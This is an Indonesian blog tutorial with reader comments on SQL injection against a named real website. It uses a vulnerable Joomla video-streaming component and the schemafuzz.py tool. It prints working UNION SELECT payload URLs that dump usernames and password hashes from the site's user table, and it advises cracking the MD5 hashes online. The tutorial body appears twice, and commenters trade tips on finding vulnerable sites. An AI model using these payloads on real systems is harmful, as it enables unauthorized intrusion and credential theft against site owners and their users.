SQL Injection mungkin bukan kata yang aneh lagi bagi para orang yang suka hacking khususnya website, Sebelumnya artikel ini ditujukan untuk anda yang tau tentang perintah SQL walaupun dikit. Oke lanjut kli ini kita akan mencoba teknik SQL Injection menggunakkan python code yaitu schemafuzz.py untuk download silahkan Klik Disini. Ingat karena ini merupakan python code jadi kita perlu menginstall python untuk menjalankannya untuk download program python silahkan langsung ke website python.org atau Klik disini, silahkan sesuaikan dengan sistem Operasi yang anda pakai.
Oke langsung aja y, setelah selesai download pythonnya langsung install aja, kemudian jalankan lewat DOS caranya masuk ke
start menu -> Run -> cmd atau command.
selanjutnya pindah ke directory python yang sudah kita install ketik cd\ lalu enter, ketikan cd Python26 -> Enter sesuaikan dengan versi python yang dipakai. kemudian copy schemafuzz.py yang sudah kita download tadi kedalam directory python.
langkah selanjutnya adalah cari target sasaran kali ini kita akan coba dengan target http://www.windsurfing.gr kita cari dulu SQL vulnerable nya, kita dapatkan pada komponent com_xsstream-dm component untuk streaming video, sekarang coba masukan perintah SQL
lihat pesan kesalahannya dibawah ada angka 3
Setelah kita dapat kode kesalahan lanjutkan dengan schemafuzz.py untuk mendapatkan nama database, nama tabel dan nama kolom dalam tabel. caranya masuk ke DOS lagi terus ketikan :
Rubah angka 3 yang ada diatas dengan darkc0de, hasilnya yang kita dapatkan seperti ini :
untuk mempelajari schemafuzz ini silahkan buka aja helpnya ketikan : schemafuzz.py -help.
dari gambar diatas kita bisa dapatkan Nama Database, User, Versi SQL yang digunakkan, Nama Tabel dan Nama Kolom dalam tabel.
setelah kita dapatkan semua,langkah selanjutnya extract kolom dalam tabel itu.
hasilnya seperti ini :
dapat dech username dan password walaupun masih dalam bentuk MD5, selanjutnya cari sendiri y tool untuk MD5 decrypt cari aja di google. oke sekian dulu mudah-mudahan bermanfaat.
Artikel ini juga bisa dilihat Disini.
Oke langsung aja y, setelah selesai download pythonnya langsung install aja, kemudian jalankan lewat DOS caranya masuk ke
start menu -> Run -> cmd atau command.
selanjutnya pindah ke directory python yang sudah kita install ketik cd\ lalu enter, ketikan cd Python26 -> Enter sesuaikan dengan versi python yang dipakai. kemudian copy schemafuzz.py yang sudah kita download tadi kedalam directory python.
langkah selanjutnya adalah cari target sasaran kali ini kita akan coba dengan target http://www.windsurfing.gr kita cari dulu SQL vulnerable nya, kita dapatkan pada komponent com_xsstream-dm component untuk streaming video, sekarang coba masukan perintah SQL
http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
lihat pesan kesalahannya dibawah ada angka 3
Setelah kita dapat kode kesalahan lanjutkan dengan schemafuzz.py untuk mendapatkan nama database, nama tabel dan nama kolom dalam tabel. caranya masuk ke DOS lagi terus ketikan :
C:\Python26>schemafuzz.py -u "http://www.windsurfing.grindex.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22/*"
Rubah angka 3 yang ada diatas dengan darkc0de, hasilnya yang kita dapatkan seperti ini :
untuk mempelajari schemafuzz ini silahkan buka aja helpnya ketikan : schemafuzz.py -help.
dari gambar diatas kita bisa dapatkan Nama Database, User, Versi SQL yang digunakkan, Nama Tabel dan Nama Kolom dalam tabel.
setelah kita dapatkan semua,langkah selanjutnya extract kolom dalam tabel itu.
http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22+from+jos_users/*
hasilnya seperti ini :
dapat dech username dan password walaupun masih dalam bentuk MD5, selanjutnya cari sendiri y tool untuk MD5 decrypt cari aja di google. oke sekian dulu mudah-mudahan bermanfaat.
Artikel ini juga bisa dilihat Disini.
bagaimana cara mencari atau Nge-test SQL vulnerable nya?
BalasHapus@sumpit
BalasHapusada banyak cara untuk untuk mengetesnya cara yang paling sering dilakukan adalah dengan memberi single quote (') pada akhir url, misalnya www.xxx.com/news.php?id=1 sehingga menjadi www.xxx.com/news.php?id=1' jika dia mempunyai vurnerable SQL maka akan muncul pesan kesalahan.
sekian mudah-mudahan bisa membantu :D
makin hari makin mntap aja kau tur hiks hiks
BalasHapuskeren mntp lanjutkan perjuanganmu tur hehehe
ajarin dunk kk..
BalasHapus:D
@bernadsatriani
BalasHapushehe ane juga masih cupu ka,lum bisa apa2 masih harus banyak belajar :)
gimana cara nyari sSQL vulnerabelnya???
BalasHapusbantuin donk>>>
@Yoyo : Caranya gimana y ane juga g bisa :D hehe ..
BalasHapuscoba j kasih tanda petik satu di URL-nya ada muncul pesan eror atau halamannya berubah g? klo ada eror berarti kemungkinan besar web itu Vuln
klo g da tapi halamannya berubah dia juga kemungkinan Vuln tapi Blink jadi pake Blind SQL Injection,
maaf y klo salah ane masih cupu sich :).
ketika saya ketikkan:
BalasHapusschemafuzz.py -u "http://contoh-target/profile.php?id=1" --findcol
yang muncul selalu:
Site must follow -f,-u,-s or -e flag and contain 'darkc0de'
kenapa????
klu gitu aja udah capek baca di google...
BalasHapusudah ada 1000 posting...
yg di butuh kan itu ya MD5 decrypt nya...
Tekan C spasi D
Cape Deeeeeeeeeeeeeeeeeeeeeeeee >.<
@Anonim : Klo mank anda dah bisa n dah bosen baca y g usah baca, klo q kan masih cupu lum ada apa2nya ..
BalasHapussaya rasa untuk MD5 decrypt banyak situs yang menyediakan, di milw0rm ada disitus lain juga banyak ko ...
Mbah google is the best buat cari info
BalasHapuscari aja MD5 nya di sana kk ^_^V
BTW for admin tqs atas ilmunya yach ehehehehe
tapi aku masih bingung nih yang bedain itu MD5,Base64,and encrypt2 lainnya apa ya >.< dari kmrn gak nemu2 beda nya >.<
pak admin sekedar sedikit info sedikit
BalasHapusGoogle URL extrator
Mungkin ini salah satu alat untuk ngeliat vulnerable dari web...
cuma di Google URL extrator ini ada file yang akan di kenali sebagai cirus oleh antivirus...
pasangannya pake SQL Exploiter
maaf ini cuma cara lama
saya masih sangat2 newbie >.<
sekedar numpang sharing aja ^_^V
klo instal di ubuntu 8.04 HH gimana nich kang
BalasHapuswah,,,tutorialnya bagus bang,,,,terimaakasih,,,,its time to trying,,,,,
BalasHapusbagaimana kalo da variable text? cth: http://bla.php?c=blaa-bla trus di inject model apa aja di nge-blank aj
BalasHapusda Yg px Instalan schemafuzz.py g????
BalasHapusq nyari2 g dapat..
please???
ato downloadx d mna???